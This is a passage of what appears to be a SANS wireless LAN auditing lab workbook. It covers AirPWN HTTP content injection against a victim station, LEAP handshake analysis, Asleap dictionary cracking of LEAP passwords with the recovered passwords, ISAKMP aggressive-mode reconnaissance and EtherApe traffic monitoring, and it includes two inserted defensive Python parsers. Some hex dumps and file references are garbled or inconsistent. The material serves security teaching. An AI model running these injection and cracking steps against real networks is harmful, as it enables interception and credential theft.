617 Workbook Wireless Networks PDF
We can see the response file contains an HTTP response message with simple HTML content. Of course, this could be any content the attacker desired.

7.1.5. [ATTACKER] Introduction to AirPWN

Next, run the AirPWN command with no command-line parameters to identify a list of available options, as shown below:

    # ./airpwn
    usage: airpwn -i <interface> -c <config file> -d <driver> -t <target IP> [options]
      -i : interface to listen on (must be in monitor mode)
      -c : configuration file
      -d : supported wireless driver name
      -t : IP address of host you are targeting
    optional arguments:
      -C : channel number to sniff/inject on
      -l : log verbose data to a file
      -f : bpf filter for libpcap
      -h : get help (this stuff)
      -v : increase verbosity (can be used multiple times)
    Supported drivers are: wlan-ng hostap airjack prism54 madwifiold madwifing rtl8180 rt2500 rt2570

NOTE: If you are getting a "permission denied" error when running the airpwn command, ensure you have specified the leading dot-slash ("./airpwn") as shown in the example above.

Before using Airpwn, we need to modify the link type of the SWAT kit wireless card. With the HostAP drivers, the default link type in monitor mode is to include Prism AVS header information for RSSI reporting and other statistics. Airpwn does not support this header type, so it is necessary to change the link type to the standard 802.11 header with the iwpriv command, as shown:

    # iwpriv wlan0 monitor_type 0

The command-line options we are going to use for the injection attack are detailed as follows:

    Option   Argument (if any)   Description
    -i       wlan0               Interface name to use for transmitting packets
    -C       <channel>           Channel the victim is operating on
    -d       wlanng              Driver name used for the wlan0 interface
    -t       <victim IP>         IP address of the victim
    -c       conf/greet_html     Configuration file

Substitute "<victim IP>" with the IP address collected from the victim station, and "<channel>" with the channel number collected from the victim station.

Implementing the injection attack is straightforward. Simply run the AirPWN command with the appropriate arguments, as shown below:

    # airpwn -i wlan0 -C <channel> -d wlanng -t <victim IP> -c conf/greet_html
    airpwn - modified for SANS SEC617 lab
    Listening for packets

At this point, the attacker is positioned to manipulate the contents of any HTTP GET requests that originate from the specified IP address.

7.1.6. [VICTIM] Browse to an unencrypted website

Return to the victim station and browse to any unencrypted website to generate the HTTP GET request that the attacker is configured to identify. Instead of the desired website content, you should receive the content from the attacker's response file.

7.1.7. [ATTACKER] Stop the client attack

Return to the attacker's session and stop the injection attack by pressing "CTRL/C". This will cause AirPWN to stop gracefully, returning to the shell prompt.

7.1.8. [VICTIM] Refresh website

After the attacker stops the injection attack, the victim station should return to normal connectivity. Refreshing the target website should produce the appropriate results.

If your system returns an error indicating "ioctl(): Device or resource is busy", it will be necessary to physically eject and reinsert your wireless card.

Additional Exercise

If you have extra time after completing this lab with your partner, modify the response file to supply your own message to the victim. Be creative, but polite.

Lab 8 - Auditing LEAP Networks

Complete the exercises in this lab to reinforce the material covered in the Auditing LEAP Networks module. To complete these exercises, you will need the lab files included on the SANS Wireless LAN Auditing Lab CD.

Lab 8-1: Examining LEAP Networks

Purpose: Introduce the techniques used to identify LEAP networks from a supplied capture file.
Description: In this lab we'll use a supplied capture file with mixed networks and extract traffic that uniquely identifies the use of the Cisco LEAP protocol.

8.1.1. Identify LEAP Traffic

Using the supplied capture file, identify all EAP traffic that uses the LEAP protocol.

Start the Wireshark sniffer by clicking "K > Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the Run button. Open the capture file for this lab by clicking "File > Open", navigate to the /tmp/lab8 folder and select the "lab8traffic.dump" capture file.

Next, apply a display filter that will display only LEAP traffic.
(Hint: Use the display fields in a packet marked as LEAP)
(Hint: Select frame 211 for a sample LEAP packet)
(Hint: Use the "type" field in the Extensible Authentication Protocol header)
(Hint: The assigned EAP type for LEAP is 17 or hexadecimal 0x11)
(Hint: "eap.type eq 17")
(Hint: The display filter should return 38 packets)

Note that this display filter identifies only traffic that includes LEAP data, and does not include the start, stop, success or failure messages. We can apply a less-specific display filter that includes LEAP and other EAP-related traffic. Remove the previous display filter, replacing it with "eapol" to display all EAP traffic, regardless of EAP type.

Question: How many packets are returned from this new filter?
Question: What additional information is included in this packet display?

8.1.2. Examining the LEAP Five-Way Handshake

The five-way LEAP handshake defines how a station authenticates to an access point, and the access point mutually authenticates to the station. Let's take a look at this process. Apply the following filter to limit the display to the initial five-way handshake in the "lab8traffic.dump" capture file:

    eapol and frame.number > 210 and frame.number < 222

Examine the frames in this exchange and answer the questions below.

Question: What is the MAC address of the access point?
Question: What is the MAC address of the station?
Question: What is the username of the authenticating user?

Select frame 211, expanding the "Extensible Authentication Protocol" protocol dissector information. The field labeled "Peer Challenge" is the 8-byte challenge from the access point to the authenticating station. Selecting frame 213, we can see that Wireshark has identified another value as the "Peer Challenge".

Question: What is wrong with the "Peer Challenge" in frame 213?

Frame 213 represents the response from the client station to the 8-byte challenge value. Note that Wireshark does not properly identify this frame, labeling it as "Peer Challenge" when it is more appropriately labeled "Peer Response". This field is also incorrectly identified as 8 bytes in length ("Peer Challenge [8]") when the contents of the field are 24 bytes in length, as indicated by the "Count" field.

The next frame in the five-way handshake is the success message from the AP, indicating that the authenticating station's response to the challenge text was correct. Examine the last two frames in the five-way handshake and answer the questions that follow. Close Wireshark after finishing this step.

Question: How does the client correctly identify the identity of the access point in the last 2 frames of the five-way handshake?

Lab 8-2: Recover Passwords with Asleap

Purpose: Introduce the use of Asleap as a mechanism to audit the security of Cisco LEAP networks.

Description: In this lab we'll use the Asleap tool to mount a dictionary attack against the supplied Cisco LEAP transactions, potentially revealing the usernames and passwords of legitimate users. Weaknesses in the challenge/response mechanism plague many LEAP implementations, offering an easy target for an attacker. An auditor can use Asleap to identify vulnerable LEAP implementations that can be abused by an attacker.
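The five-way exchange examined in 8.1.2 can be recognised and decoded straight from the EAP header fields, which is what the "eap.type eq 17" filter does and what an auditor inventorying LEAP use on a network needs. The Python below is an added example written for this workbook, not SANS or Asleap code; the frames it parses are constructed here (the MAC addresses, username and AP challenge are taken from the lab output, the 24-byte responses and the station challenge are made up) and it reads the LEAP Count field the way the text describes, so the "[8]" label Wireshark puts on frame 213 would be flagged.

```python
"""Decode C​isco LEAP (EAP type 17) from EAPOL frames and reconstruct the five-way
handshake for auditing: which station authenticated as which user to which AP.

Added example for this lab, not SANS or Asleap code. Frames are EAPOL payloads
(the bytes after the 802.11/LLC headers); the sample exchange below is
constructed, reusing only the MAC addresses, username and AP challenge from the lab.
"""
import struct

EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_TYPE_LEAP = 17          # the value behind the "eap.type eq 17" display filter
LEAP_CHALLENGE_LEN = 8      # Count field of a LEAP Request
LEAP_RESPONSE_LEN = 24      # Count field of a LEAP Response (MS-CHAP style)


def parse_eap(eapol):
    """Parse an EAPOL frame carrying an EAP packet; returns None for other EAPOL types."""
    _version, eapol_type, eapol_len = struct.unpack("!BBH", eapol[:4])
    if eapol_type != 0:     # 0 = EAP-Packet (1 = EAPOL-Start, 3 = EAPOL-Key, ...)
        return None
    eap = eapol[4:4 + eapol_len]
    code, ident, length = struct.unpack("!BBH", eap[:4])
    pkt = {"code": code, "id": ident, "type": None}
    if code in (EAP_REQUEST, EAP_RESPONSE) and length > 4:
        pkt["type"] = eap[4]
        if pkt["type"] == EAP_TYPE_LEAP:
            version, _unused, count = eap[5], eap[6], eap[7]
            pkt["leap"] = {"version": version,
                           "count": count,          # true length of the data field
                           "data": eap[8:8 + count],
                           "name": eap[8 + count:length].decode("ascii", "replace")}
    return pkt


def leap_handshake(frames):
    """Reconstruct the handshake from (src_mac, dst_mac, eapol_bytes) tuples.

    Order: AP challenge -> station response -> success -> station challenge -> AP response.
    """
    hs = {"ap_mac": None, "sta_mac": None, "username": None, "ap_challenge": None,
          "sta_response": None, "success": False, "sta_challenge": None,
          "ap_response": None, "errors": []}
    for src, dst, eapol in frames:
        pkt = parse_eap(eapol)
        if pkt is None:
            continue
        leap = pkt.get("leap")
        if pkt["code"] == EAP_SUCCESS and hs["sta_response"] is not None:
            hs["success"] = True
        elif leap and pkt["code"] == EAP_REQUEST and hs["ap_challenge"] is None:
            hs.update(ap_mac=src, sta_mac=dst, username=leap["name"], ap_challenge=leap["data"])
            if leap["count"] != LEAP_CHALLENGE_LEN:
                hs["errors"].append("AP challenge Count is %d, expected 8" % leap["count"])
        elif leap and pkt["code"] == EAP_RESPONSE and src == hs["sta_mac"]:
            hs["sta_response"] = leap["data"]
            if leap["count"] != LEAP_RESPONSE_LEN:   # Wireshark's "[8]" label is wrong here
                hs["errors"].append("station response Count is %d, expected 24" % leap["count"])
        elif leap and pkt["code"] == EAP_REQUEST and src == hs["sta_mac"]:
            hs["sta_challenge"] = leap["data"]       # station now challenges the AP
        elif leap and pkt["code"] == EAP_RESPONSE and src == hs["ap_mac"]:
            hs["ap_response"] = leap["data"]         # AP proves knowledge of the password hash
    hs["complete"] = hs["success"] and hs["ap_response"] is not None
    return hs


def leap_frame(code, ident, count, data, name):
    """Build one EAPOL-encapsulated LEAP packet (constructed test data)."""
    body = bytes([EAP_TYPE_LEAP, 1, 0, count]) + data + name.encode()
    eap = struct.pack("!BBH", code, ident, 4 + len(body)) + body
    return struct.pack("!BBH", 1, 0, len(eap)) + eap


def eap_result_frame(code, ident):
    """Build an EAP Success/Failure packet (no type field)."""
    eap = struct.pack("!BBH", code, ident, 4)
    return struct.pack("!BBH", 1, 0, len(eap)) + eap


# Constructed sample: MACs and username from the lab answers, AP challenge from the
# leapexch1 asleap output; the 24-byte responses and the station challenge are made up.
AP, STA = "00:40:96:58:20:58", "00:0a:8a:47:d2:53"
AP_CHALLENGE = bytes.fromhex("f92f966625097069")
SAMPLE_FRAMES = [
    (AP, STA, leap_frame(EAP_REQUEST, 1, 8, AP_CHALLENGE, "atrager")),
    (STA, AP, leap_frame(EAP_RESPONSE, 1, 24, bytes(range(24)), "atrager")),
    (AP, STA, eap_result_frame(EAP_SUCCESS, 1)),
    (STA, AP, leap_frame(EAP_REQUEST, 2, 8, bytes(range(8)), "atrager")),
    (AP, STA, leap_frame(EAP_RESPONSE, 2, 24, bytes(range(24, 48)), "atrager")),
]

if __name__ == "__main__":
    result = leap_handshake(SAMPLE_FRAMES)
    print("LEAP user %s, AP %s, station %s, complete: %s, errors: %s" % (
        result["username"], result["ap_mac"], result["sta_mac"], result["complete"], result["errors"]))
```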
As we saw in the course material, Asleap consists of two components: the "genkeys" tool, which creates the database of NTLM hashes and passwords, and the "asleap" tool, which examines the LEAP five-way handshake and uses the genkeys database to identify weak user passwords.

8.2.1. Generate a NTLM Hash Database

In this step, we'll use the genkeys tool and the supplied dictionary file to generate the database file and corresponding index file to supply to the asleap tool.

First, open an XTerm window and change to the /tmp/lab8 folder, as shown below.

    # cd /tmp/lab8
    # pwd
    /tmp/lab8

Run the genkeys command with no arguments to see a list of command-line options, as shown below.

    # genkeys
    genkeys 1.4.2 - generates lookup file for asleap.
    genkeys: Must supply -r -f and -n
    Usage: genkeys [options]
      -r  Input dictionary file, one word per line
      -f  Output pass+hash filename
      -n  Output index filename
      -h  Last 2 hash bytes to filter with (optional)

Using the supplied wordlist file "words" in the lab8 directory, generate the database files to use with asleap, as shown below. Note that this example was generated on a Pentium 4 2.8 GHz system.

    # genkeys -r words -f words.dat -n words.idx
    genkeys 1.4.2 - generates lookup file for asleap.
    Generating hashes for passwords (this may take some time) ...Done.
    135426 hashes written in 0.60 seconds: 225487.15 hashes/second
    Starting sort (be patient) ...Done.
    Completed sort in 1055547 compares
    Creating index file (almost finished) ...Done.
    # ls -l words.*
    -rw-r--r--  1 root root 3813222 2005-04-21 13:53 words.dat
    -rw-r--r--  1 root root 1030086 2005-04-21 13:53 words.idx

Question: How many hashes/second was your system able to generate?

After generating the database and index files with genkeys, we can proceed to auditing the LEAP challenge/response exchange for weak passwords with asleap.

8.2.2. Identify Weak Passwords

In this step, we'll assess the supplied packet capture files for weak passwords. First, run the "asleap" tool with no arguments to see a list of available command-line options, as shown below.

    # asleap
    asleap 1.4.2 - actively recover LEAP/PPTP passwords.
    asleap: Must supply an interface with -i, or a stored file with -r
    Usage: asleap [options]
      -r  Read from a libpcap file
      -i  Interface to capture on
      -f  Dictionary file with NT hashes
      -n  Index file for NT hashes
      -w  Write the LEAP exchange to a libpcap file
      -s  Skip the check to make sure authentication was successful
      -a  Perform an active attack (faster, requires AirJack drivers)
      -c  Specify a channel (defaults to current)
      -o  Perform channel hopping
      -t  Specify a timeout watching for LEAP exchange (default 5 seconds)
      -D  List available devices for live capture
      -h  Output this help information and exit
      -v  Print verbose information (more -v for more verbosity)
      -V  Print program version and exit
      -W  ASCII dictionary file (special purpose)

We can see from the usage options that we can read the LEAP transaction information from a libpcap file with the "-r" option, specifying the genkeys database file with "-f" and the genkeys index file with "-n".

Use asleap to assess the LEAP transaction stored in the "leapexch1.dump" capture file with the genkeys files created in the previous step, as shown below:

    # asleap -r leapexch1.dump -f words.dat -n words.idx
    asleap 1.4.2 - actively recover LEAP/PPTP passwords.
    Using the passive attack method.
    Captured LEAP exchange information:
            username:       atrager
            challenge:      f92f966625097069
            response:       98c9fbAsebd6cf3596ad605eTbAcdi809416aR4L050248L4
            hash bytes:     586c
            NT hash:        8846f7eaee8fb117ad06bdd830b7586c
            password:       password
    Closing pcap ...

Question: Was asleap able to recover the username and password included in the leapexch1.dump LEAP transaction?
Question: What was the password reported by asleap?
Question: Does the calculated last 2 bytes of the NTLM hash displayed on the "hash bytes:" line of the asleap output match the last two bytes of the actual user password hash?

Next, assess the contents of the LEAP transaction file stored in the "leapexch2.dump" capture file, as shown below:

    # asleap -r leapexch2.dump -f words.dat -n words.idx
    asleap 1.4.2 - actively recover LEAP/PPTP passwords.
    Using the passive attack method.
    Closing pcap ...

In this case, the asleap tool did not attempt to recover the password from the LEAP transaction supplied in the capture file. We can increase the verbosity of information reported by asleap by adding the "-v" parameter, as shown below:

    # asleap -r leapexch2.dump -f words.dat -n words.idx -v
    asleap 1.4.2 - actively recover LEAP/PPTP passwords.
    Using the passive attack method.
    Captured LEAP challenge:
    0802 7500 000a 8247 d253 0040 9658 2058  ..u....G.8.8.x X
    0040 9658 2058 90c8 asaa 0300 0000 B86e  .8.x x.
    0100 0017 Oler a017 1101 0008 1671 Sdc2  ....
    cbs e73f 6174 7261 6765 72ff ffff ff     1... 2atrager.
    Captured LEAP response:
    0801 3201 0040 9658 2058 000a 847 d253
    0040 9658 2058 c091 aaaa 0300 0058 Babe
    0100 0027 02ef 0027 1101 0018 Sbf4 fdc2
    Jdfd 4a0a 96d3 3c23 e762 Gaza 3523 6295
    6174 7261 6765 72ff ffff ff

    Using the passive attack method.
    Captured LEAP exchange information:
            username:       DOFS\jnovak
            challenge:      f622f5c4b0115c27
            response:       322039638c506a67a65c80316a346e7f598560046127f607
            hash bytes:     be5b
    Could not find a matching NT hash.  Try expanding your password list.
    I've given up.  Sorry it didn't work out.
    Closing pcap ...

Question: What can we deduce about the authentication architecture of the network from the username in the leapexch3.dump capture?
Question: What prevented asleap from discovering the password in this file?

In this example, asleap was unable to identify the password for the user "DOFS\jnovak". This is because the password for this user was not present in the input dictionary file supplied to the genkeys tool. We can expand the dictionary file supplied to genkeys to include more potential passwords and reassess this transaction, if desired.

Assess the LEAP exchange contents in the "leapexch4.dump" capture file, and answer the questions that follow.

Question: Was asleap able to recover the password from the LEAP exchange in the leapexch4.dump capture?
Question: What kind of policies would be required to mitigate the recovery of weak LEAP passwords?
Question: How could an administrator enforce this kind of a policy?

This completes our 8th lab exercise. Congratulations.

Answers

Section 8.1.1
Question: How many packets are returned from this new filter?
Answer: 114 packets.
Question: What additional information is included in this packet display?
Answer: EAPOL start, success and key distribution frames are also displayed with the "eapol" display filter.

Section 8.1.2
Question: What is the MAC address of the access point?
Answer: The AP is at 00:40:96:58:20:58.
Question: What is the MAC address of the station?
Answer: The station MAC is 00:0a:8a:47:d2:53.
Question: What is the username of the authenticating user?
Answer: The username is "atrager".
Question: What is wrong with the "Peer Challenge" in frame 213?
Answer: The "Peer Challenge" is actually the 24-byte peer response and is not a "random value" as Wireshark indicates.
Question: How does the client correctly identify the identity of the access point in the last 2 frames of the five-way handshake?
Answer: The client forces the AP to pass a challenge/response authentication to ensure it is a legitimate access point and not an imposter.

Section 8.2.1
Question: How many hashes/second was your system able to generate?
Answer: This will vary depending on the performance of your system.

Section 8.2.2
Question: Was asleap able to recover the username and password included in the leapexch1.dump LEAP transaction?
Answer: Yes.
Question: What was the password reported by asleap?
Answer: "password"
Question: Does the calculated last 2 bytes of the NTLM hash displayed on the "hash bytes:" line of the asleap output match the last two bytes of the actual user password hash?
Answer: Yes, both values are 0x586c.
Question: Examine the information that is reported by asleap in verbose reporting mode - what characteristics of this capture file would cause asleap to not attempt to recover the user's password?
Answer: The authentication failed, so Asleap does not attempt to recover the password.
Question: What can we deduce about the authentication architecture of the network from the username in the leapexch3.dump capture?
Answer: The authentication architecture is likely a Windows environment where "DOFS" is the Windows domain name.
Question: What prevented asleap from discovering the password in this file?
Answer: The user's password was not in the input dictionary file.
Question: Was asleap able to recover the password from the LEAP exchange in the leapexch4.dump capture?
Answer: Yes, the password is "flounder".
Question: What kind of policies would be required to mitigate the recovery of weak LEAP passwords?
Answer: A strong password selection policy is required.
Question: How could an administrator enforce this kind of a policy?
Answer: By rejecting users' passwords that are weak and regularly auditing password selection with tools like Asleap.

Lab 9 - Auditing VPN/Segmented Networks

Complete the exercises in this lab to reinforce the material covered in the Auditing VPN/Segmented Networks module. To complete these exercises, you will need the lab files included on the SANS Wireless LAN Auditing Lab CD.

Lab 9-1: Identifying IPSec Traffic

Purpose: Introduce the techniques used to identify ISAKMP traffic from a supplied capture file.

Description: In this lab we'll use a supplied capture file with mixed networks and extract traffic that identifies the presence of IPSec traffic. We'll look for the presence of the ISAKMP protocol and UDP-tunneled traffic, and identify the method used for ISAKMP negotiation.

9.1.1. Connect to the Classroom Network

Execute the following commands from a shell prompt to connect to the SANS-ROGUE01 network:

    # killall dhcpcd
    # iwconfig wlan0 essid SANS-ROGUE01 enc off mode managed
    # dhcpcd -d wlan0

At this point, your system should be connected to the SANS-ROGUE01 network. If you had trouble getting to this point, please contact a proctor or the instructor for assistance.

9.1.2. Assessing ISAKMP Traffic

Using the "lab9capture.dump" capture file from the lab CD, we can examine sample ISAKMP traffic. Start the Wireshark sniffer by clicking "K > Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the Run button. Open the capture file for this lab by clicking "File > Open", navigate to the /tmp/lab9 folder and select the "lab8traffic.dump" capture file.

Next, apply a display filter that will display only ISAKMP traffic.
(Hint: Use the protocol field name)
(Hint: Use all lower-case letters)
(Hint: The display filter should return 20 packets)
(Hint: "isakmp")

Select the first ISAKMP frame with the source address "172.16.0.99". This is the client system that is initiating the ISAKMP negotiation with the VPN server. Notice that Wireshark has identified this frame as "Aggressive" in the Info column. Expand the fields in the protocol dissector view and answer the following questions. Note that this file has been modified from its original form; errors indicating invalid checksums can be safely ignored.

Question: What IP protocol is used for ISAKMP traffic?
Question: What source port and destination port are used for ISAKMP traffic?
Question: What field identifies the ISAKMP frame as "Aggressive"?
Question: What is the supported encryption mechanism for this client system in transform payload number 10?
(Hint: Expand the security association (SA) payload)
(Hint: Expand the proposal payload #1)
(Hint: Expand the transform payload #10)
Question: What is the identified authentication mechanism in transform payload number 10?
Question: What is the identified hashing algorithm mechanism in transform payload number 10?

Next, select the first frame with the source address "192.168.254.254". This is the VPN server system that is responding to the ISAKMP negotiation request with its supported capabilities. Answer the following questions relating to the capability information of this device.

Question: What is the supported encryption protocol for this VPN server?
(Hint: Expand the ISAKMP payload)
(Hint: Expand the security association (SA) payload)
(Hint: Expand the proposal payload #1)
(Hint: Expand the transform payload #10)
Question: What is the supported hashing algorithm for this VPN server?
Question: What is the supported authentication mechanism for this VPN server?

As we can see from this ISAKMP exchange, we can determine several factors about the IPSec server and client systems, including the supported encryption mechanisms, hashing mechanisms and authentication mechanisms.

Recall from the material that Aggressive mode ISAKMP negotiation shortens the exchange to three frames but exposes identity information. Expand the identification payload information to reveal additional details about the IPSec server.

Question: What is the reported protocol and port information in the identification payload?
Question: What does the identification data represent?

Note that the IP address identified in the identification data represents the actual IP address of the VPN server. The "192.168.254.254" IP address reflects the NAT address from a firewall protecting the VPN server but does not prevent the server from disclosing its internal IP address. This can give the attacker additional information about the characteristics of the network that can be valuable in other attacks.
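The fields this section has you read in Wireshark (the exchange type, the SA/proposal/transform attributes and the identification payload) can be pulled out of the UDP/500 payload directly, which is how an auditor can check many captures for aggressive-mode peers and cleartext identities without clicking through each frame. This Python parser is an added example written for this workbook, not SANS or Wireshark code; the message it decodes is constructed here to mirror the lab values (transform 10 with 3DES-CBC, MD5 and XAUTHInitPreShared, a KEY_ID identity of "staff" over UDP port 500) and is not taken from the capture file.

```python
"""Decode an ISAKMP (IKEv1) message from a UDP/500 payload and report what an auditor
cares about: the exchange mode, the proposed transforms and any identity sent in clear.
Added example for this lab, not SANS or Wireshark code. The sample message is
constructed to mirror the lab values (transform 10: 3DES-CBC, MD5, XAUTHInitPreShared;
KEY_ID identity "staff" over UDP/500); it is not copied from the capture file.
"""
import struct

EXCHANGE_TYPES = {2: "Identity Protection (Main Mode)", 4: "Aggressive", 5: "Informational"}
PAYLOAD_SA, PAYLOAD_PROPOSAL, PAYLOAD_TRANSFORM, PAYLOAD_ID = 1, 2, 3, 5
ENCRYPTION = {1: "DES-CBC", 5: "3DES-CBC", 7: "AES-CBC"}                  # attribute 1
HASH = {1: "MD5", 2: "SHA1"}                                              # attribute 2
AUTH_METHOD = {1: "Pre-Shared Key", 3: "RSA Signatures", 65001: "XAUTHInitPreShared"}  # 3
ID_TYPES = {1: "IPV4_ADDR", 2: "FQDN", 3: "USER_FQDN", 11: "KEY_ID"}


def _attributes(data):
    """Decode transform attributes: TV (2-byte value) when the AF bit is set, else TLV."""
    attrs, i = {}, 0
    while i + 4 <= len(data):
        atype, val = struct.unpack("!HH", data[i:i + 4])
        if atype & 0x8000:
            attrs[atype & 0x7fff], i = val, i + 4
        else:
            attrs[atype], i = int.from_bytes(data[i + 4:i + 4 + val], "big"), i + 4 + val
    return attrs


def _payloads(data, first_type):
    """Walk a chain of generic payloads; each 4-byte header names the next payload type."""
    ptype, i = first_type, 0
    while ptype != 0 and i + 4 <= len(data):
        next_type, _reserved, plen = struct.unpack("!BBH", data[i:i + 4])
        yield ptype, data[i + 4:i + plen]
        ptype, i = next_type, i + plen


def parse_isakmp(udp_payload):
    """Parse the 28-byte ISAKMP header plus the SA and Identification payloads."""
    (_ispi, rspi, next_payload, version, exch, _flags, _msg_id,
     length) = struct.unpack("!8s8sBBBBII", udp_payload[:28])
    msg = {"version": "%d.%d" % (version >> 4, version & 0xf), "exchange_type": exch,
           "exchange": EXCHANGE_TYPES.get(exch, "unknown(%d)" % exch),
           "responder_spi_set": rspi != bytes(8), "transforms": [], "identities": []}
    for ptype, body in _payloads(udp_payload[28:length], next_payload):
        if ptype == PAYLOAD_SA:                       # DOI(4) + situation(4) + proposals
            for _pt, prop in _payloads(body[8:], PAYLOAD_PROPOSAL):
                prop_no, _proto, spi_size, _count = struct.unpack("!BBBB", prop[:4])
                for _tt, trans in _payloads(prop[4 + spi_size:], PAYLOAD_TRANSFORM):
                    attrs = _attributes(trans[4:])    # transform#, id, reserved(2), attrs
                    msg["transforms"].append({
                        "proposal": prop_no, "transform": trans[0],
                        "encryption": ENCRYPTION.get(attrs.get(1), "unknown"),
                        "hash": HASH.get(attrs.get(2), "unknown"),
                        "auth": AUTH_METHOD.get(attrs.get(3), "unknown")})
        elif ptype == PAYLOAD_ID:
            id_type, proto, port = struct.unpack("!BBH", body[:4])
            msg["identities"].append({"id_type": ID_TYPES.get(id_type, str(id_type)),
                                      "protocol": proto, "port": port, "data": body[4:]})
    return msg


def audit_findings(msg):
    findings = []
    if msg["exchange_type"] == 4:
        findings.append("Aggressive mode: identities are exchanged before the channel is encrypted")
    for ident in msg["identities"]:
        findings.append("Identity disclosed in the clear: %s %r (protocol %d, port %d)" % (
            ident["id_type"], ident["data"], ident["protocol"], ident["port"]))
    for t in msg["transforms"]:
        if t["hash"] == "MD5" or t["encryption"] in ("DES-CBC", "3DES-CBC"):
            findings.append("Transform %d offers legacy %s with %s" % (
                t["transform"], t["encryption"], t["hash"]))
    return findings


# --- constructed sample: one aggressive-mode first message (SA + ID; KE and nonce omitted)
def _payload(next_type, body):
    return struct.pack("!BBH", next_type, 0, 4 + len(body)) + body

def _attr(atype, value):
    return struct.pack("!HH", 0x8000 | atype, value)              # TV-form attribute

def build_sample():
    transform = _payload(0, bytes([10, 1, 0, 0])                  # transform #10, KEY_IKE
                         + _attr(1, 5) + _attr(2, 1) + _attr(3, 65001) + _attr(4, 2))
    proposal = _payload(0, bytes([1, 1, 0, 1]) + transform)       # proposal #1, no SPI, 1 transform
    sa = _payload(PAYLOAD_ID, struct.pack("!II", 1, 1) + proposal)  # IPsec DOI, SIT_IDENTITY_ONLY
    ident = _payload(0, struct.pack("!BBH", 11, 17, 500) + b"staff")  # KEY_ID, UDP, port 500
    body = sa + ident
    header = struct.pack("!8s8sBBBBII", b"\x11" * 8, bytes(8), PAYLOAD_SA, 0x10, 4, 0, 0, 28 + len(body))
    return header + body


SAMPLE_MESSAGE = build_sample()
```

Running `audit_findings(parse_isakmp(SAMPLE_MESSAGE))` gives three findings: the aggressive-mode exchange, the cleartext KEY_ID identity, and the legacy 3DES/MD5 transform.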
Next, remove the display filter to reveal additional capture information in this trace. Scroll to the traffic that follows the ISAKMP negotiation and answer the questions that follow.

Question: What IP protocol is used to encapsulate IPSec traffic following the ISAKMP negotiation?
Question: What port number is used for the upper-layer traffic encapsulation protocol?
Question: What is the likely vendor associated with the port number used for traffic encapsulation?

9.1.3. Assessing Traffic with EtherApe

EtherApe is a great example of a powerful open-source tool that has a wide variety of uses. From the perspective of auditing wireless networks, EtherApe is useful in characterizing traffic on the network, including the ability to identify traffic patterns that can characterize the use of a VPN server for wireless network security.

Note: At the time of this writing, EtherApe recognizes a limited number of network encapsulation methods. For this reason, EtherApe cannot graph the activity on the wireless network unless the station is connected to the wireless network. Future versions of this tool may support monitoring the network while in RFMON mode as well.

First, start EtherApe by clicking "K > Backtrack > Sniffers > EtherApe". Backtrack will start EtherApe with the first interface name it recognizes, which is "lo". This produces an error as shown:

    Link type not yet supported

[Figure: EtherApe unsupported link type error]

Click OK to acknowledge this error. Next, click "Capture > Interfaces > wlan0" to select the wireless card as the monitoring data source. EtherApe will immediately begin to graph the activity on the network, identifying active hosts and protocols. Since the wireless network is a shared medium, EtherApe can observe all traffic on the network and document it accordingly.

The default configuration of EtherApe is to graph activity from hosts in the "instant view", where the hosts that are currently communicating the most are indicated with thick interconnecting lines, as shown below. This doesn't provide us with a strong overall sense of the activity on the network, since the interconnecting lines only indicate the current bandwidth utilization on the network.

[Figure: EtherApe screen using the instant view for traffic representation]

We can change the behavior of EtherApe to change the size of the node to reflect accumulated traffic. Select the preferences icon on the EtherApe screen and change the "Node size variable" option to "Accum. traffic (In+Out)", as shown below. Click OK to close the preferences window.

[Figure: EtherApe preferences dialog box]

Question: What characteristic of node traffic indicates a host that is transmitting and receiving a significant amount of traffic?
Question: What characteristics would indicate the presence of a VPN server on the wireless network?

Work with a lab partner to generate traffic on the wireless network, noting the corresponding activity in EtherApe. From an XTerm, use different tools such as ping, nmap and netcat to generate traffic. For example, working with a partner you can designate a client and a server to transfer files with netcat as shown below (initiate the server before the client). Create a 10 MB file of random data, then establish a netcat server to transfer the file.

    root@1[root]# dd if=/dev/urandom bs=1024 count=10000 of=data
    10000+0 records in
    10000+0 records out
    10240000 bytes transferred in 5.869933 seconds (1744483 bytes/sec)
    root@1[root]# ls -l data
    -rw-r--r--  1 root root 10240000 Sep 21 07:53 data
    root@1[root]# nc -l -n -vv -p 18000 < data
    (UNKNOWN) [10.0.0.104] 18000 (?) open
    sent 0, rcvd 10240000
    root@1[root]#

Press "CTRL/C" on the client to end the transfer once EtherApe indicates the file transfer has completed. You may need to reduce the maximum node size in the EtherApe options if there is too much traffic on the network to recognize different transactions. Repeat this procedure using different file sizes and different port numbers. Which hosts generate the greatest amount of traffic on the network?

This completes our 9th lab exercise. Congratulations.

Answers

Section 9.1.2
Question: What IP protocol is used for ISAKMP traffic?
Answer: UDP
Question: What source port and destination port are used for ISAKMP traffic?
Answer: Source and destination port 500 are used.
Question: What field identifies the ISAKMP frame as "Aggressive"?
Answer: The ISAKMP exchange type has a value of 4, indicating an aggressive mode exchange.
Question: What is the supported encryption mechanism for this client system in transform payload number 10?
Answer: Triple DES in CBC mode (3DES-CBC).
Question: What is the identified authentication mechanism in transform payload number 10?
Answer: XAUTHInitPreShared, or pre-shared key authentication.
Question: What is the identified hashing algorithm mechanism in transform payload number 10?
Answer: MD5
Question: What IP protocol is used to encapsulate IPSec traffic following the ISAKMP negotiation?
Answer: UDP
Question: What is the reported protocol and port information in the identification payload?
Answer: Port 500
Question: What does the identification data represent?
Answer: The identification data "staff" indicates the group name that is being used for the pre-shared key authentication.
Question: What port number is used for the upper-layer traffic encapsulation protocol?
Answer: 10,000 for source and destination port to encapsulate traffic for NAT.
Question: What is the likely vendor associated with the port number used for traffic encapsulation?
Answer: Port 10,000 is commonly used for ISAKMP-NAT encapsulated traffic with Cisco equipment.

Lab 10 - Auditing WPA/PSK Networks

Complete the exercises in this lab to reinforce the material covered in the Auditing WPA/PSK Networks module. To complete these exercises, you will need the lab files included on the SANS Wireless LAN Auditing Lab CD.

Lab 10-1: Auditing WPA/PSK Networks

Purpose: Introduce the techniques used to identify and audit WPA/PSK networks.

Description: In this lab we'll use a supplied capture file with mixed networks and extract traffic that identifies the presence of IPSec traffic. We'll look for the presence of the ISAKMP protocol and UDP-tunneled traffic, and identify the method used for ISAKMP negotiation.

10.1.1. Assessing WPA/PSK Traffic

